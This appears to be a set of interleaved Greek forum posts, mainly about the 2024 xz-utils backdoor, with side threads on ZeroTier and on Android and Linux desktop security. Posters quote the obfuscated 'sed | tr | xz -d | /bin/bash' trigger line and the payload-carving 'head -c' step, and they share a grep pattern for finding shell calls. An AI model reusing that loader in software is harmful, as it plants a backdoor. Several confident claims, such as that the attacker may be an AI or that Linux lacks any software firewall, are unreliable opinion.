υ.γ. γιαυτο ζητησα να βαζετε λινκς με τα μοντελα γιατι π.χ. στο ax3 που ειπες πριν το 1ο ρουτερ/modem που μου εφερε το ψαχτηρι ηταν ενα huawei.... λολ

αν αναρωτιεται κανεις ποια ηταν η μορφη της backdoor στην xz library, αυτη η γραμμη ειναι

" sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " \-_" " _\-" | xz -d | /bin/bash >/dev/null 2>&1;"

που οπως εξηγει αυτος που το βρηκε αφηνει ως αποτελεσμα...

"| bash"
απο https://www.openwall.com/lists/oss-security/2024/03/29/4

τοσο απλα γιατι παιρνει pipe την bash!

και καπου εδω ξεκιναει το μεγαλο ψαξιμο στους κωδικες ..

π.χ.
grep -E -r -color "bash|sh|csh|tcsh|zsh|scsh|ksh" --include=*.{h,cpp} .

δυστυχως δεν ειναι τοσο απλο το attack και με ενα απλο grep ΔΕΝ μπορει καποιος να το αποκαλυψει. Οχι οτι ειναι λαθος η grep εντολη που ειχα βαλει αλλα αυτη θα πρεπει να τρεξει αφου γινουν Deobfuscate ολα τα sed, tr, cut, eval κλπ στα ... 700 commits που εχει κανει!!!

1. Το ολο θεμα ειναι ακομα υπο διερευνηση.

2. Απ'οσο ξερουμε (και απ'οσο καταλαβαινω μια ματια που εριξα..):

Αν το ssh ειναι προσβασιμο απο "εξω",
και το backdoor ειναι ενεργο,
θα μπορουσε να συνδεθει καποιος 3ος (που εχει το κλειδι του backdoor),
και να αποκτησει προσβαση στο συστημα.


και ηδη εχουν αρχισει καποιοι και αναρωτιουνται μηπως δεν ειναι ανθρωπινο χερι πισω απο αυτην την επιθεση.

ειναι παρα πολυ προχο αυτο που εγινε γιατι κανει backdoor και αλλες υπηρεσιες ταυτοχρονα οπως το ssh στην προκειμενη περιπτωση

Το οτι θα αλλαξεις το κλειδι του sshd δε σημαινει αυτοματα οτι σωζεσαι.

Κι ενα ωραιο infographic:

255110

αυτο το σχεδιαγραμμα δειχνει ποσο περιπλοκη ειναι η επιθεση και εγω ειμαι πλεον της αποψης οτι δεν ειναι ανθρωπινο χερι λογω πολυπλοκοτητας

ΑΙ εγραψε ο prophet ... https://gynvael.coldwind.pl/?id=782

"
2024-03-31 19:14:58 = prophet
{
i think Jia Tan is an AI
}
"

δεν ξερω αν ειναι ΑΙ αλλα ενα ειναι το σιγουρο... ΘΑ ΜΠΟΡΟΥΣΕ ακριβως για τον λογο του οτι μια τετοια επιθεση στον κωδικα μονο με... νοημοσυνη ανιχνευεται!

υ.γ. επισης αυτος που το ανακαλυψε ειναι της MS ....

Το νημα του Zerotier


Σιγουρα θα πει καποιος τι ειναι αυτο το Zerotier και τι δουλεια εχει το νημα αυτο στα Forum: ADSL & Broadband Hardware, routers και modems... κλπ κλπ


Καταρχην πρεπει να πω οτι το Zerotier εγκαθισταται και στις Συσκευες που μας προσφερουν το ιντερνετ στο σπιτι και γιαυτον τον λογο ανοιγω αυτο το θεμα εδω (ελπιζω να μην εχει ξανανοιχθει αν και δεν εφερε κατι η αναζητηση) και ο λογος προφανης. Το προηγουμενο λινκ οπως θα δειτε εχει αναφορες σε μαρκες και υλοποησεις αλλα οχι σε μοντελα και ειναι ως επι το πλεισον routers που αν καποιος θελει να τα αγορασει για το σπιτι θελει και modem, θελει και αλλα πραγματα να κανει περα απο την αγορα τους.


Τωρα το κρισιμο ερωτημα ειναι τι ειναι το Zerotier?

Το Zerotier αν και com ειναι ενα project ανοιχτου κωδικα που μεσω ενος σερβερ δημιουργει εικονικα δικτυα (vpn networks) με αποτελεσμα να δημιουργειται ενα ... lan με αλλους Η/Υ που τους εμπιστευεστε πανω απο το ιντερνετ και ετσι συνδεομενοι σε αυτο το δικτυο ολοι μαζι (το σημαντικοτερο ειναι εδω)

Μπορειτε να παιζετε τα παλια σας LAN games με τους φιλους σας πανω απο το ιντερνετ.


Αν και οpen source project εχει περιορισμενους χρηστες για την free εκδοση και φυσικα οσο περισσοτεροι συνδεονται τοσο περισσοτερο ανεβαινει η τιμη λεγοντας εδω οτι αν και το free πακετο αυτην την στιγμη προσφερει 1 admin και 25 nodes (Η/Υ) που ειναι πολυ τιμιο για αυτους που απλα θελουν να παιξουν τα παιχνιδια lan με τους κολλητους τους οπως κανουν οσοι ξεμειναν με τα Windows 7 και εψαχναν να βρουν πως να συνεχισουν να παιζουν τα παιχνιδια τους online με τους φιλους τους που εχουν τα Windows 10 και 11 μετα τους αποκλεισμους απο καποιες απο τις μεγαλες πλατφορμες online gaming τον τελευταιο χρονο (ευτυχως οχι ολες).


Απο το τελευταιο λινκ θα βαλω ενα βιντεο για να δειτε πως μεσω Zerotier + Sunshine + Moonlight (αλλα 2 open source project) μπορει καποιος να παιξει οχι μονο LAN GAMES αλλα και τα single player RETRO οπως τα mame :respekt: π.χ


https://www.youtube.com/watch?v=vLKg0JB54EQ


Ετσι ανοιξα αυτο το νημα για να πειτε αρχικα πως σας φαινεται ως λυση το Zerotier και αν το χρησιμοποιειται στις συσκευες που σας παρεχουν ιντερνετ στο σπιτι η δουλεια? Ποιο μοντελο ειναι, ποσο κοστιζει, αν ειχατε προβληματα και οτιδηποτε πανω σε αυτην υπηρεσια σε σχεση με το μοντελο της συσκευης ιντερνετ που εχετε και με λινκς αν σας ειναι ευκολο :oneup:

255089
καθολου τυχαιο που το ειχαν χωσει

ε ναι ηθελαν να χτυπησουν αυτους τους λινουξ-αδες που προστατευονται περισσοτερο (γραφω παρακατω πως)

το linux DE ειναι σε λιγο καλυτερη μοιρα απο τα DE των κινητων γιατι παρνει updates και ο χρηστης ειναι διαχειριστης της συσκευης αλλα ΣΤΕΡΕΙΤΑΙ ΕΡΓΑΛΕΙΩΝ αμυνας για ... DESKTOP σε σχεση με τα windbloz (ας μην βαλω τα λινκς με τα wiki - l - e - a - k - s αλλα οποιος τα ψαξει θα βρει τις αναφορες για συγκεκριμενα προγραμματα SOFTWARE FIREWALL που οι ειδικοι εσπασαν τα μουτρα τους! )


εκτος αν καποιος με Linux DE ΣΥΝΔΕΕΤΑΙ ΜΟΝΟ ΜΕΣΩ VPN στο ιντερνετ που η 1η γραμμη αμυνας ειναι ο HEADLESS λινουξ vpn σερβερ και αυτος τρεχει τα ανασφαλη προγραμματα οπως ειναι οι browsers μεσω ... DOCKER που ουσιαστικα ειναι chroot (δηλαδη headless παλι στον Η/Υ του)

ΑYTOΣ Ο ΛΙΝΟΥΞ DE ΧΡΗΣΤΗΣ MONO ΜΕΣΩ BACKDOOR ΣΕ FIRMWARE / DRIVER ΤΗΝ ΠΑΤΑΕΙ... ΟΠΩΣ ΣΤΗΝ Χ.Ζ ΒΙΒΛΙΟΗΚΗ => https://www.adslgr.com/forum/threads/1274597-Backdoor-%CF%83%CF%84%CE%BF-xz-utils-5-6-0?p=7561821#post7561821

Μαλλον πανικοβαλλεσαι χωρις ουσιαστικο λογο. Για τους δισκους δεν παιζει τιποτα. Επισης για τη μητρικη, το συγκεκριμενο backdoor δε νομιζω να εκανε κατι, αλλιως κατι θα ειχανε βρει μεχρι τωρα, αφορα Linux συστηματα.

Δεν χρειαζεται να κανεις κατι αλλο κατα τη γνωμη μου.


δεν πανικοβαλεται χωρις λογο ...


H XZ ΔΗΜΙΟΥΡΓΕΙ BACKDOOR DRIVER ΜΕ ΧΡΗΣΗ ΚΩΔΙΚΑ RC4 ΚΡΥΠΤΟΓΡΑΦΙΑΣ, ΓΙΑΤΙ ΑΡΑΓΕ?

εδω ολο το decrypt της 5.6.1 εκδοσης που καταληγουν τα sed, eval & τα regex σε ...

https://gynvael.coldwind.pl/?id=782

"
6. And then bytes from N (0) to W (~86KB) are being carved out using the same usual head tricks, and saved as liblzma_la-crc64-fast.o – which is the final binary backdoor.

((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o
"

ΑΠΟΨΗ ΜΟΥ ΠΑΝΤΑ ...

για το προβλημα οτι ειχε μεινει με 2 dev αυτη η πολυ σημαντικη βιβλιοθηκη φταινε 100% οι ΚΑΘΗΓΗΤΕΣ ΠΛΗΡΟΦΟΡΙΚΗΣ!

Τι ηταν ο TANENBAUM ? καθηγητης
Τι ηταν ο Linus οταν ξεκινησε το Linux? Φοιτητης
Τι ειναι το Debian? Του Πανεπιστημιου του Ορεγκον
Απο που βγαινουν οι Στρατιες των Linux-αδων ? Απο τα Πανεπιστημια

ΚΑΙ ΠΟΙΟΣ ΘΥΣΑΥΡΙΖΕΙ ΑΠΟ ΤΙΣ ΠΤΥΧΙΑΚΕΣ ΤΩΝ ΦΟΙΤΗΤΩΝ ΠΟΥ ΓΙΝΟΝΤΑΙ ΒΙΒΛΙΑ η ΠΩΛΙΟΥΝΤΑΙ ΣΤΙΣ ΕΤΑΙΡΕΙΕΣ ΩΣ PROJECTS η ΠΙΑΝΟΥΝ ΘΕΣΕΙΣ CEO/ΣΥΜΒΟΥΛΩΝ ΣΕ ΕΤΑΙΡΕΙΕΣ ΔΙΣΕΚΑΤΟΜΜΥΡΙΩΝ?


ΤΟ ΠΡΟΒΛΗΜΑ TOY LINUX ΠΟΥ ΛΕΓΕΤΑΙ ΚΑΘΗΓΗΤΕΣ ΠΛΗΡΟΦΟΡΙΚΗΣ ΘΑ ΕΠΡΕΠΕ ΗΔΗ ΝΑ ΕΙΧΑΝ ΜΟΙΡΑΣΕΙ ΤΑ ΠΡΟJECTS ΣΕ ... ΠΕΔΙΑ ΕΥΘΥΝΗΣ


αν θελουν να συνεχισουν να μιλανε για open source community θα πρεπει να αλλαξουν νοοτροπια!

οτι αλλο ειπωθει για το linux θα ειναι παραπετασμα καπνου απο τους ιδιους που κανουν δουλιτσες με τις εταιρειες εκμεταλευομενοι την δουλεια των φοιτητων για να βγαζουν λεφτα. Ακριβως τα ιδια και χειροτερα κανει η google με το android που ουτε καν ενα σοβαρο antivirus συστημα δεν εχει δημιουργησει για το play store (για να μην αρχισω παλι τα frankestein αγαπη μου ).

οταν βγαζουν εκατομμυρια ειναι καλα, οταν ειναι να κανουν σωστα την δουλεια τους ολοι αυτοι οι εκμεταλευτες θυμουνται το ... COMMUNITY δηλαδη ... τα ΚΟΡΟΙΔΑ!!!

ΣΙΓΑ ΜΗΝ ΦΤΑΙΕΙ Ο ΚΥΡΙΟΣ DEV ΕΠΕΙΔΗ ΔΕΝ ΜΠΟΡΕΙ ΝΑ ΑΣΧΟΛΗΘΕΙ ΜΕ ΤΟ PROJECT TOY

ξερει κανεις αν δεν του ειχαν βαλει και κανενα :gun: στον κροταφο?

Καλησπερα σαν αρχαριος χρηστης που ειμαι διαφωτιστε με.Μεχρι χτες το πρωι ειχα fedora 40 beta.Σημερα εμαθα για το xz το οποιο αν καταλαβα καλα ειναι για αποσυμπιεση αρχειων.Αυτο αν καποιος εγκαταστησει νεο iso fedora h tubletweed συμπεριλαμβανεται και ειναι στη εκδοση 5.4 οπου θεωρητικως ειναι ασφαλης σωστα καταλαβα;; Γιατι δε το αφαιρουν τελειως απο το iso??? Ενας απλος χρηστης τι πρεπει να κανει αν εγκαταστησει τωρα tublet h fedora.


η fedora ειναι η beta εκδοση της Red Hat και εβαλες την Fedora beta?

Τωρα αυτο ειναι beta² η betax2?

/joke mode off

προσωπικα δεν θα το θεωρουσα ασφαλης γιατι ο τυπος εχει δραστηριοτητα 2 χρονια και μπορει να εχει φυτεψει και αλλα backdoors!

αυτο βρεθηκε μεχρι στιγμης...

συμβουλη μου? οτι πουν οι dev της fedora. ακομα μιλανε . το τελευταιο msg ειναι πριν 24 min ...

https://discussion.fedoraproject.org/t/attention-malicious-code-in-current-pre-release-testing-versions-variants-f40-and-rawhide-affected-users-of-f40-rawhide-need-to-respond/110683/19


μην βαλεις τιποτα κωδικους email e-banking κλπ μεχρι να σιγουρευτεις και αν εχεις ηδη βαλει δεν ηρθε η συντελεια απλα κατεγραψε ΣΕ ΕΝΑ ΧΑΡΤΙ ΠΟΥ ΕΙΝΑΙ ΑΧΑΚΑΡΙΣΤΟ:p που εχεις ηδη βαλει...

αν αναρωτιεται κανεις ποια ηταν η μορφη της backdoor στην xz library, αυτη η γραμμη ειναι

" sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " \-_" " _\-" | xz -d | /bin/bash >/dev/null 2>&1;"

που οπως εξηγει αυτος που το βρηκε αφηνει ως αποτελεσμα...

"| bash"
απο https://www.openwall.com/lists/oss-security/2024/03/29/4

τοσο απλα γιατι παιρνει pipe την bash!

και καπου εδω ξεκιναει το μεγαλο ψαξιμο στους κωδικες ..

π.χ.
grep -E -r -color "bash|sh|csh|tcsh|zsh|scsh|ksh" --include=*.{h,cpp} .

Κανει τις γνωσεις περι hardening ακομη πιο πολυτιμες απο ssh,apache,nginx,selinux,apparmor,iptables. κοκ


αστα ειναι πολυ δυσκολα τα πραγματα και αυτο που ευχονταν οι linux-αδες θα αρχισουν να το καταριουνται σιγα σιγα γιατι καλη η "διασημοτητα" αλλα εχει μεγαλες ευθυνες κιολας.

π.χ. backdoor στην xz βιβλιοθηκη και "εσκασε" σημερα!

απο https://www.openwall.com/lists/oss-security/2024/03/29/4

"To: oss-security@...ts.openwall.com
Subject: backdoor in upstream xz/liblzma leading to ssh server compromise

Hi,

After observing a few odd symptoms around liblzma (part of the xz package) on
Debian sid installations over the last weeks (logins with ssh taking a lot of
CPU, valgrind errors) I figured out the answer:

The upstream xz repository and the xz tarballs have been backdoored.

At first I thought this was a compromise of debian's package, but it turns out
to be upstream."


περισσοτερα στο θεμα αυτο...
https://www.adslgr.com/forum/threads/1274597-Backdoor-%CF%83%CF%84%CE%BF-xz-utils-5-6-0

Maintainers απο αλλα repositories που εκανε commit ο τυπος ψαχνονται να δουν τι commit ειχε κανει τοτε και αν μπορει να ειναι malicious.

Εμφανιστηκε ο Lasse Collin, ο πρωτος developer: https://tukaani.org/xz-backdoor/

και καπως ετσι ενας contributor συμπαρεσυρε τον κυριο dev στην κολαση μιας και απο μονος του πλεον χωρις να του πει κανενας και θα ψαξει γραμμη προς γραμμη τι προσθεσε ο Jia Tan αλλα και ηδη αρχισε να απολογειται για το τι εκανε αυτος και τι ο αλλος

ασε που κανεις δεν θα τον εμπιστευεται απο εδω και περα και θα το κοιταζουν ολοι με μισο ματι...

υ.γ, αυτο ανοιξε τους μεγαλους ασκους του Αιολου...

αφηνω εδω τις 1ες παραγραφους απο mails του debian
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1068024

1)

"Package: xz-utils
Version: 5.6.1+really5.4.5-1
Severity: important
Tags: security

I count a minimum of 750 commits or contributions to xz by Jia Tan, who
backdoored it.

This includes all 700 commits made after they merged a pull request in Jan 7
2023, at which point they appear to have already had direct push access, which
would have also let them push commits with forged authors. Probably a number of
other commits before that point as well.

Reverting the backdoored version to a previous version is not sufficient to
know that Jia Tan has not hidden other backdoors in it. Version 5.4.5 still
contains the majority of those commits."



2)

"On 2024-03-29 16:25, Joey Hess wrote:
> I'd suggest reverting to 5.3.1. Bearing in mind that there were security
> fixes after that point for ZDI-CAN-16587 that would need to be reapplied.

Note that reverted to such an old version will break packages that use
new symbols introduced since then. From a quick look, this is at least:
- dpkg
- erofs-utils
- kmod
"

και εβαλα μονο αυτα που ειναι τεχνικης αποψεως χωρις να προσθεσω το αχρειαστο δραμα που ηδη ξεκινησε....

Αντε μετα να ξαναεμπιστευτεις (και εμεις και οι διανομες) το xz...

παει αυτο ... its official dead :bless:


Ο τυπος εκανε μεγιστη ζημια.

εχω την εντυπωση οτι αυτο ειναι προεορτια ενος νεου μεγαλου πολεμου αλλα παλι ισως οχι και μακαρι να κανω λαθος

Καλα τα λες χερ Γεροντα. Αν και ειναι πολλοι περισσοτεροι, ολα βασιζονται σ' αυτο.

Για να προσθεσω γαρνιτουρα στα γραφομενα του SWBiiLive. Το exploitability των Vindows με την διαθεση για επιθεση σε linux like συστηματα και το WSL ειναι σαν πυρηνικη βομβα.

Καπου εγραψε ο Dan Walsh οτι απο το 90% που ξερει τι ειναι το selinux, μονο το 1% το εχει σε enforce mode :rolleyes: Απο αυτο να κρινεις οτι οι βελτιστες πρακτικες (που αντιστοιχουν σε hardening) δεν πολυ εφαρμοζονται. Με πολυ κακες συνεπειες μπορει να εχει αυτο :(.


Ενδιαφερουσα αντιδραση. :hmm:


Εχω την εντυπωση οτι οι κατασκευαστες προσπαθουν να μας πεισουν οτι αυτο που γραφεις ειναι αληθες. Το οτι ειναι εφικτο οπως γραφεις δε σημαινει οτι για τον τελικο χρηστη (Μεσο Παπαδοπουλο) ειναι και το απολυτως επιθυμητο. :)
...


μακαρι να απετρεπαν τους χρηστες των κινητων ωστε να μην χρησιμοποιουν τα κινητα τους ως αντικαταστατες των Η/Υ αλλα δεν νομιζω να τους ενδιαφερει. αποψη μου παντα και μακαρι να κανω λαθος ομως αυτο που ειπες με το WSL πραγματικα το ειχα ξεχασει αλλα δειχνει ξεκαθαρα οτι το...

LINUX ΕΙΝΑΙ ΠΑΝΤΟΥ ΠΛΕΟΝ

με οτι σημαινει αυτο για την πυρηνικη βομβα που λες, και εδω να πω οτι στο μονο μηχανημα μου που εχω βαλει το wsl ειναι ... lab pc :p προσωπικα παντα

Εγω χρησιμοποιω αυτη τη σελιδα για να μου θυμιζει αυτα που ξεχναω: https://arialdomartini.github.io/lesser-known-bash-shortcuts

booked :clap:

Γιατι;


ο σημαντικοτερος λογος ειναι οτι το linux ειναι πλεον ο Νουμερο 1 στοχος των χακερ για περισσοτερους απο εναν λογους αλλα ο σημαντικοτερος ειναι ο Εξης

ΤΟ LINUX ΠΛΕΟΝ ΒΡΙΣΚΕΤΑΙ ΣΤΙΣ ΠΕΡΙΣΣΟΤΕΡΕΣ ΣΥΝΔΕΔΕΜΕΝΕΣ ΣΥΣΚΕΥΕΣ ΣΤΟ ΙΝΤΕΡΝΕΤ

και οταν λεω λινουξ συμπεριλαμβανω και τα android (το θεμα μας) κλπ συσκευες ΙοΤ γιατι η ασφαλεια των λειτουργικων ξεκιναει και τελειωνει στο RING O δηλαδη στον πυρηνα του ακα... KERNEL == LINUX

πριν κανει το λαθος καποιος και το αμφισβητησει ας περασει μια βολτα απο τα σαιτ που βγαζουν στατιστικα . π.χ. https://gs.statcounter.com/os-market-share

ετσι στο θεμα μας και αν καποιος διαβασει τι εγραψα πριν με τα δεδομενα του 2024 τα κινητα που συνδεονται στο ιντερνετ αποτελουν οχι μονο την πλειοψηφια αλλα και τον ευκολο στοχο με οτιδηποτε συνεπαγεται αυτο.

Ομως ακριβως για αυτον τον λογο στοχοποιουνται πλεον και τα desktop linux που σε συγκριση με τα windows desktop ΥΣΤΕΡΟΥΝ κατα κρατος σε εργαλεια αμυνας και πριν παλι αναφερθει καποιος στα firewalls, snorts κλπ

a) ΔΕΝ ΥΠΑΡΧΕΙ ΑΚΟΜΑ SOFTWARE FIREWALL ΣΤΑ LINUX οπως εχουν τα windows (κατι παει να γινει στο Github με ενα app σε python αλλα χλωμο το βλεπω)
b) τα linux desktop τρεχουν γραφικο περιβαλον σε σχεση με τους linux servers που υποστηριζονται απο εξιδεικευμενο προσωπικο, δλδ περισσοτερα εκτελεσιμα και αρα περισσοτερη εκθεση σε exploit
c) τα linux desktop τρεχουν ΑΝΑΣΦΑΛΗ ΠΡΟΓΡΑΜΜΑΤΑ και το 1ο και καλυτερο ειναι οι ... BROWSERS!!!
d) Χρησιμοποιουνται προγραμματα για servers σε desktop κατι που ειναι λαθος εξ αρχης μιας και ειναι διαφορετικοι οι ρολοι τους (αλλη εκδοση antivirus-software firelwalls βγαινουν για τα windows servers και αλλη για τα desktops)
e) δεν εχουν ολες οι διανομες τις ιδιες δικλειδες ασφαλειας. αλλες χρησιμοποιουν selinux, αλλες appramor και αναθεμα αν ενας κοινος linux user ξερει τι πραγματικα κανουν και πως να τα ρυθμισουν!
και το ποιο σημαντικο...

f) https://grsecurity.net/... δεν χρειαζεται να γραψω περισσοτερα

γιαυτους τους λογους εγω δινω συμβουλη σε οσους σκεφτονται να πανε τωρα στα Desktop Linux να κατσουν μακρια (για servers να τα χρησιμοποιουν και να τα μαθουν τα Linux αλλα χωρις DE) γιατι δεν ειναι απλα τα πραγματα και δυστυχως ουτε το Linux Foundation θελει να υποστηριξει τα Linux DE ουτε η gOOgle την ενδιαφερει τι γινεται στα DE αν και απο εκει ξεκινησε το προβλημα με το android της, και προτιμα να σφυριζει αδιαφορα και να κανει πως δεν καταλαβαινει :p

Γιατι το λειτουργικο android ειναι πραγματικα ενα φρανκεσταιν λειτουργικο που αν δεν θελει ο κατασκευαστης του κινητου να το υποστηριξει δεν παιρνει update μετα απο καποια χρονια (δηλαδη μενει ο KERNEL με ευπαθεια), o χρηστης δεν εχει δικαιωματα διαχειριστη εξαρχης και αν προσπαθησει να κανει root δηλαδη να γινει administrator στο κινητο του μπορει να καει και καμια ενσωματωμενη συσκευη (το iineage μου εκαψε το wifi μια μερα αφου το εβαλα στο 2ο smartphone μου) η να μεινει με ενα τουβλο στο χερι (κοινως brick στο 3ο smartophone που εκανα root και εκει σταματησα τις προσπαθειες). Γιαυτους ακριβως τους λογους το καλυτερο που εχει καποιος να κανει ειναι ΝΑ ΜΗΝ ΧΡΗΣΙΜΟΠΟΙΕΙ το κινητο του ως ΑΝΤΙΚΑΤΑΣΤΑΤΗΣ του Η/Υ.

Το android της google μονο προβληματα εφερε και θα συνεχισει να φερνει στους ιδιοκτητες των κινητων αλλα και στους χρηστες του Linux και γιαυτους τους λογους οι dev του keepass εχουν υλοποιησει και το usb key γιατι το usb key προσφερει αυτο που δεν προσφερει το file. φυσικη προστασια!

υ.γ.1 και πριν αναφερει κανενας ρομαντικος την "ΚΟΙΝΟΤΗΤΑ" του rooting στα smartphones... ποια κοινοτητα ρε παιδες? τα 4 ατομα του TWRP? https://twrp.me/about/

υ.γ.2 καταλαβαινω οτι για πολυ κοσμο ειναι πλεον ευκολια αλλα μην κλαινε αν τους χακαρουν τα κινητα με τους χακερ της πλακας που εφεραν απο εξω οπως εγινε με το Predator που ολες οι επιθεσεις ηταν τυπου phising γιατι αυτο πραγματικα εγινε με τα μυνηματα με τα παραποιημενα url. ΤΑ ΚΙΝΗΤΑ ΕΙΝΑΙ ΤΡΥΠΙΑ ΑΦΟΥ ΔΕΝ ΕΧΟΥΝ SOFTWARE FIREWALLS η ΔΕΝ ΕΧΟΥΝ ΠΑΡΕΙ UPDATES ΤΟΥ KERNEL & αυτη ειναι ΔΥΣΤΥΧΩΣ η πραγματικοτητα, μας αρεσει δεν μας αρεσει!

υ.γ.3 και σε αυτο το βιντεο καποιος δοκιμασε 2000 ιους εναντιον του norton 360. Στην πλειονοτητα των dekstop linux φτανει 1 ιος για να τα κανει zombie και υπαρχουν μπολικοι ηδη...

https://www.youtube.com/watch?v=Jfn1_EDNqS0&t=454

ειδα οτι εβγαλε μηνυμα για το γιουτουμπ... οποιος δεν θελει να παει εκει μπορει να δει το βιντεο σε ενα invidious instance π.χ https://docs.invidious.io/instances/ να διαλεξει ενα instance και να βαλει αυτην την αριθμοσειρα Jfn1_EDNqS0


Βγαζεις μεγαλο πονο μιλαμε, τι σου εχει τυχει? θες να μας πεις?

διαβασε το τελος της προηγουμενης παραθεσης για να μαθεις. Δεν νομιζω να ειμαι ο μονος που την πατησε με τις customιες

ελληνικα ειδησιογραφικα και forums. Μαλλον καποιοι κρινουν οτι υπαρχει πολυ ελευθεροτυπια και πρεπει να μειωθει... :down:

Αστα, γεμισαμε με ΜΑΣΚαρεμενους φτωχοδιαβολους, υπηρετες του "Πισω απο Εδω" που μιλανε Ελληνικα, Σκεφτονται στα Οθωμανικα και ξεροσταλιαζουν στα παραλια του Βορειο-Ανατολικο-Νοτιου Αιγαιου μπας και τους πεσει κανα "τυχερο" εξ ανατολων... που θα ελεγε και ο τζιμακος!

Δεν ξερω τι λες, εγω εχω firewall στο δικο μου
https://xdaforums.com/t/5-0-root-3-6-0-afwall-iptables-firewall-28-aug-2023.1957231/


ναι ...

ΑΛΛΑ ΕΦΤΙΑΞΕΣ ΚΑΙ ΤΗΝ ΕΚΔΟΣΗ ΤΗΣ ROM ΠΟΥ ΤΡΕΧΕΙ?

δεν νομιζω ... εκτος και αν εισαι dev σε καποια εκδοση απο αυτες αλλα λιγακι απιθανο γιατι δεν ειναι πολλοι και οσο περναει ο καιρος γινονται λιγοτεροι αφου δεν υπαρχει αντικειμενικο κερδος για την ενασχοληση σε αυτο το αντικειμενο

υ.γ. τα κινητα απο οπου και να τα πιασει καποιος ειναι ΓΤΠ, ΕΛΛΕΕΙΝΑ & ΤΡΙΣΑΘΛΙΑ!

θα εβαζα μια φωτογραφια απο τις αρχες του 1900 με παρατεταμενα ηλεκτρικα αυτοκινητα αλλα δεν θελω να ανοιξω απο την 1η μερα τα χαρτια μου στο ζητημα αυτο.

αντιθετως θα βαλω ενα λινκ απο ελληνικο σαιτ κιολας που καλυψε το ζητημα ΗΛΕΚΤΡΙΚΑ ΑΥΤΟΚΙΝΗΤΑ απο το ... 1830!!!

Ηλεκτρικα αυτοκινητα: 200 χρονια ιστορια


Οχι τιποτα αλλο για να μην νομιζουν οι Ελληνες οτι ειναι καινουργιο φρουτο τα ηλεκτρικα αυτοκινητα!

Τα κινητα εχουν firewall απο το δικτυο που συνδεονται, ειτε ειναι το firewall του παροχου στο 4G, ειτε το firewall του WiFi.

Αυτο που δεν εχουν τα περισσοτερα ειναι security updates που κλεινουν τρυπες στο λειτουργικο τους.

ΑΣΤΕΙΟ ΕΙΠΕΣ ΤΩΡΑ ΕΤΣΙ??

για το θεμα updates εχεις δικιο αλλα ξερεις ειναι ολα προσαρμοσμενα στην λογικη της ανακυκλωσης -> κινουμενης οικονομιας και PMI αλλα μην το βαρυνουμε με εννοιες ακαταλληλες για το 99% των νεοελληνων.

Αν εχεις χακερ ηδη μεσα στη συσκευη σου, δεν σε σωζει ουτε το firewall ουτε κατι αλλο.

μολις απελυσες τους προγραμματιστες των τμηματων firewALL των επι πληρωμη antivirus :p

NORTON 360, MALWAREBYTES, COMODO ΚΛΠ ΣΑΣ ΤΕΛΕΙΩΣΕ Ο ΗΑΜΜΕΡΕΝΤ

υ.γ. ΛΙΝΟΥΞαδες μια συμβουλη μονο. Μην αποθηκευετε κωδικους στο keepass χωρις secure file ΚΑΙ usb key

Αν γινοταν στην Ελλαδα και ειχε ακρες, θα δηλωνε αθωος και θα μας κουνουσε και το δαχτυλο... χωρια οι μηνυσεις στα ΜΜΕ που θα το ανεφεραν , γατακια Αμερικανοι..

μην το λες αυτο γιατι σε αλλα sites δεν επιτρεπεται καν να γραψεις την λεξη PREDATOR και να βαλεις και λινκ στην λεξη κιολας!

υ.γ. δοκιμη κανω Κε mod. μην το παρεις προσωπικα οπως κανουν αλλα sites (καλυτερα να μην πω ονομα και εκτεθουν οι ΜΑΣΚοφοροι)

... να χρησιμοποιει τον αριθμο τηλεφωνου τους ως αναμεταδοτη για την αποστολη κωδικων προσβασης SMS...


αν δεν εχει ιντερνετ το κινητο πραγματικα δεν υπαρχει κανενα θεμα ασφαλειας

ΤΟ ΠΡΟΒΛΗΜΑ ΜΕ ΤΑ ΚΙΝΗΤΑ ΕΙΝΑΙ ΟΤΙ ΧΩΡΙΣ ΝΑ ΕΧΟΥΝ FIREWALLS η ΔΙΚΑΙΩΜΑΤΑ ADMIN ΤΑ ΧΡΗΣΙΜΟΠΟΙΟΥΝ ΟΛΟΙ ΩΣ ΗΛΕΚΤΡΟΝΙΚΟΥΣ ΥΠΟΛΟΓΙΣΤΕΣ

δηλαδη τα κινητα σημερα που μιλαμε ειναι σαν να ειναι οι Η/Υ της εποχης των modems με διπλη συνδεση στο internet κιολας που η 2η συνδεση ειναι μεσω wifi σε μια αλλη ιντερνετικη γραμμη που αν σου εχουν χακαρει την συσκευη ακομα και να κλησεις το μοντεμ θα συνδεεται πανω σου ο χακερ μεσω αλλης γραμμης μιας και θα επικοινωνει το trojan που σου εχει φυτεψει!

ΑΥΤΗ ΕΙΝΑΙ Η ΠΡΑΓΜΑΤΙΚΗ ΚΟΛΑΣΗ ΜΕ ΤΑ ΚΙΝΗΤΑ

Η ΧΡΗΣΗΣ ΤΟΥΣ ΚΑΙ Η ΕΛΛΕΙΨΗ FIREWALLS!

υ,γ, για να μην πω οτι ολοι βαζουν τις εφαρμογες αντι να χρησιμοποιουν τους browsers για ολα αυτα τα site οπως ειναι και το telegram / twiter κλπ και ετσι η εφαρμογη τρεχει 24 ωρες το 24ωρο στο κινητο αντι για οση ωρα τα χρησιμοποιουν!